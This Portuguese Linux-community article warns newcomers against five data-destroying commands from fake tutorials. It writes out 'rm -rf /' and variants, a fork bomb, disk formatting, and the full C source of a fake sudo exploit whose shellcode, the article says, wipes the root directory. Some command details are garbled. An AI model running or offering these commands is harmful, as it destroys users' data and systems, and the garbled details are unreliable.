5 comandos que ninguém nunca deve executar no Linux

[helldanger1]

O terminal é sem dúvida uma poderosa arma, feito para facilitar a nossa vida, assim como uma faca de cozinha que ajuda em muito na hora de cozinhar. Porém como uma faca em mãos erradas é sinal de perigo, assim é o terminal com o trio copiar-colar-enter.

Por: M4iir1c10

Introdução
Linux é poderoso e divertido. Quando se trata de algo com muito poder, vale lembrar o conselho do tio Ben ao jovem Peter Park:

"Com grandes poderes, vem grandes responsabilidades"

Quando se é novo no Linux, frequentemente procuramos obter ajuda de outros e quase a maioria dos conselhos que você receberá será na forma de alguns comandos como ps, top, modprobe, lspci.

Tenha cuidado quando você executar esses comandos, infelizmente existem alguns anti-Linux a serviço do mal, malucos invejosos que tentam enganar novos usuários com dicas e tutoriais falsos, como nesse fórum:
A list of tutorials for Ubuntu (NÃO EXECUTE ESSES COMANDOS)

Se você seguir estas dicas e executar esses comandos, perderá todos os seus arquivos, e ninguém será culpado a não ser você. Esteja consciente do que você está fazendo!

Não faça de todas instruções como em uma receita de bolo, seguindo a risca sem saber o que está fazendo. Use as man pages, elas estão aí para isso (manuais do Linux, em um terminal digite: "man comando", o manual será mostrado na tela. EX: man mplayer).

Desta forma você aprenderá a aproveitar muito mais as opções que o Linux te dá.

Se você estiver em dúvida sobre os comandos que te passaram, entre aqui no VOL e coloque todos os comandos suspeitos e informações sobre o que você quer fazer, tipo assim:

"Olá, eu estava tentando fazer isso e um rapaz do forum.xyz.com me disse para executar esse comando (rm -Rf /). Suspeito que este seja um comando nocivo. Alguma sugestão?"

Guarde as minhas palavras, a comunidade tem um grande espírito de união, o espírito de compartilhar conhecimentos. Você terá boas sugestões, bem explicativas, muito rapidamente, eu mesmo já postei para alguns novatos respostas dentro de minutos após eles colocarem as perguntas aqui no VOL.

Se você ainda estiver em dúvida, sugiro que execute os comandos dentro do VirtualBox. Isso mesmo, estou falando para os novatos instalarem um Linux dentro de outro Linux criando uma máquina virtual. Não é uma tarefa difícil e existe vastas informações sobre isso aqui mesmo no VOL. Assim você pode testar quantos comandos e configurações quiser sem se preocupar em detonar o seu sistema.

Agora chega de blá blá blá, vamos aos 5 comandos perigosos que o maluco do fórum mandou as pessoas executarem. NÃO EXECUTE ESSES COMANDOS! Eles são apenas para sua informação. Esses comandos não são feitos para fazer mal ao seu computador, mas com um par de opções, pode ser muito perigoso.

O Linux não sabe que dentro de uma pasta do seu diretório home existe a foto da sua namorada. É o seu dever garantir que esses e outros arquivos fiquem seguros.

 

[helldanger1]

Primeiro comando
Vamos começar. Repito, NÃO EXECUTE ESSES COMANDOS. Se você quiser testar, sugiro-lhe executá-los dentro de uma máquina virtual (VirtualBox).

1. O rei de todos os males:

# rm -rf /

P. O que faz um rm?
A. Remove um arquivo

P. O que é r?
A. Recursão. Isso significa que dentro de uma pasta, de outra pasta naquela pasta e assim por diante.

P. O que é f?
A. Force. Isso significa que você está dizendo para o comando: "Nunca me perguntar nada. Basta fazer o que eu mandar fazer".

P. O que é /?
A. Seu diretório raiz!

Veja o que o comando faz: recursivamente remove todos os arquivos dentro do seu diretório raiz sem chatear você - "Devo apagar isso, sim ou não?".

Existem várias versões do rm disponíveis, tais como:

# rm -rf .
# rm -rf *

Pouco conhecimento é perigoso!

Que tal isso? Como você faria para apagar todos os arquivos ocultos de uma pasta, sabendo que os arquivos ocultos no Linux começam com .? Você poderia pensar em um comando como esse:

# rm - .*

Nããããããoooooo!

Esse comando irá apagar todos os arquivos um nível acima do diretório atual.

 

[helldanger1]

Segundo, terceiro e quarto comandos
2. Como fazer um backup do seu diretório home ou algumas pastas? Nunca tente fazer qualquer coisa como:

# mv /home/seunome/* /dev/null

P. O que é mv?
A. Mover arquivos.

P. O que é /dev/null?
A. Nulo, não significa nada. Em outras palavras, é um buraco-negro.

Se você executar o comando acima ele irá mover todos os arquivos dentro do seu diretório home para um buraco-negro, Hasta la vista baby!

3. Terminal Linux não é um brinquedo, é algo para aprender e fazer coisas produtivas. Eu só queria avisar que você não deve escrever nada bobo e apertar ENTER como esta bobagem:

){:|:&};:

Esses rostinhos, que mais parecem aqueles usados em chat, parecem inofensivos, mas no terminal eles são comandos. O comando acima executa processos diferentes causando o congelamento de seu computador. Você obterá uma espécie de "Blue Screen of Death", "Tela Azul da Morte"! (usuários do Windows conhecem ela muito bem).

4. Que tal criar um sistema de arquivos do Linux?

# mkfs.ext3 /dev/sda

Os dados de seu disco rígido sumirão e nunca voltarão. Isso foi uma festa de despedida para seus documentos, você acabou de executar algo similar a um "format C:\*.*".

 

[helldanger1]

Quinto comando e finalização
5. Você já ouviu falar que os olhos podem mentir? Bem, às vezes. O que você verá no seguinte arquivo escrito em C por alguém alegando ser uma correção de uma falha de segurança do "sudo" é na verdade a raiz de todo o mal.

...
#### NÃO SE ATREVA A COMPILAR ISSO E EXECUTAR ######
#### ESSE CÓDIGO LOCO FOI TIRADO DA SEGUINTE PAGINA ####
#### Full Disclosure: [Beyond Security] New sudo off-by-one poc exploit. ####
/*
* off by one ebp overwrite in sudo prompt parsing
function
* discovered by beyond security in 2007, thx ge
*
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
*
* please use responsibly! a patch has already been
sent
* upstream and a fix will be included in the next
sudo release
*
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
void fill (char *buff, int size, unsigned long val) {
unsigned long *ptr = (unsigned long *) buff;
for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
}
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
close (0); close (1); close (2);
fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
}
snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
SPROMPT, nops, shellcode, rets);
return exp_buffer;
}
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;
}

 

[helldanger1]

Então, esta é uma versão do código hexadecimal para "rm -rf / &". Isto faz nada mais nada menos que limpar o seu diretório raiz.

Estas são apenas algumas orientações para que você não seja enganado e pense que o Linux não presta, ele é muito poderoso e esse poder todo fica ao seu dispôr, por isso lembre-se do conselho do tio Ben.

Se você quiser aprender Linux, conquistar o poder sobre o seu computador, se divertir e ser produtivo, é preciso ter cuidado e partilhar o seu conhecimento.

Por: M4iir1c10